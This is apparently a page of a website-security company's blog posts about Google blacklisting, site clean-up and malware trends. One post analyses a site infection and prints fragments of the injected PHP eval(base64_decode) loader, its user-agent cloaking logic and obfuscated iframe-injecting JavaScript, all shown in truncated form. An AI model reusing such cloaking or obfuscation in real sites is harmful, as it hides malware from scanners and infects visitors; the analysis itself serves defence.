Protect Your Interwebs!
If you go to a site that is Blacklisted by Google, you will see a new (and prettier) malware warning now if you are using a Mac:
The Website Ahead Contains Malware!
Google Chrome Has Blocked access to site.com for now.
Even if you have visited this site safely in the past, visiting it now may infect your Mac with malware.
Nothing major has changed, but we found this new wording to be more clear for the end user. So good move from the Google/Chrome team.
We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.
We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:
Read More
If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here
This is an update to our previous post about Google blacklisting. We have some updated numbers to share.
Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?
Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?
To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.
On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.
That’s it. Let us know if you have any questions or comments.
Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!
We were analyzing an infected site today and their Google blacklist diagnostic said the following:
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.
Hum… So Google.com was somehow infected as well? I know it is probably some small sub site from within Google, but I found it interesting that they listed Google’s main domain in there.
If you look at Google’s own diagnostic page, it says:
31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.
Has this site hosted malware?Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.
Let’s see if Google actually blacklists themselves 
We are seeing a big issue on Google for the last few days. Whenever a site got blacklisted, you had the option to request a review after the site was clean. Something like that:
In the last few days many sites hosted at Network Solution got blacklisted by Google. In all of them the report from Google was:
URL: sitename
Last checked: June 2, 2010
General problem
When Google last tested this page, no content was returned from your server.
Instead, the browser was redirected to a malicious web page. It is likely
that your server configuration has been modified.
On the ones that we manually checked, the sites were clean and malware-free (no redirection). They were all hosted at the IP address 205.178.145.65, and it looks like that their other servers didn’t get affected.
What happened? It seems that either that server got compromised affecting all sites on it or a bug on Google’s malware checker.
If your site got blacklisted and it says on the warning page something along these lines: (and you are hosting at that IP address)
Read More
Google recently published a list with the top 1000 most visited web sites in the world. We found that list very interesting and decided to take a closer look at them.
These are stats we took:
A few of these numbers really amazed us. Nginx, for example, was used in 15% of the sites, very close to IIS with only 17%. Jquery is being used in almost 30% of the top sites and 42% are using Google analytics.
Read More
Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already changing their tactics to hide from Google.
Why is this bad business for the malware writers? Well, if a site gets blacklisted, less users will visit it and less people will load their malware and get infected. Good for everyone else, bad for them.
Anyway, yesterday we were analyzing a malware that added the following code to the index.php of a site:
:< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ? >
After we decode it, we got a code that looked like:
if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&&
(!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”)))
{
return base64_decode(“PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+”);
}
else
{
return “”;
}
So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case. For everyone else they would see the malware javascript:
var bpxDsSbm8=’d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@”*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split(‘*%@’).join(“”));
If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.
Want to read more stories like this one? Subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net. With malware? Need help? send us an email.
Do you need to remove sensitive information from Google? Found a dead link in our search results? Want to help us improve our SafeSearch filter?
Check out Google’s Webpage removal request tool:
https://www.google.com/webmasters/tools/removals?pli=1
People often complain that once something is “out there”, you can’t get it back anymore, but this feature can certainly help when you got sensitive information exposed and needs some damage control. Google +1.
Comments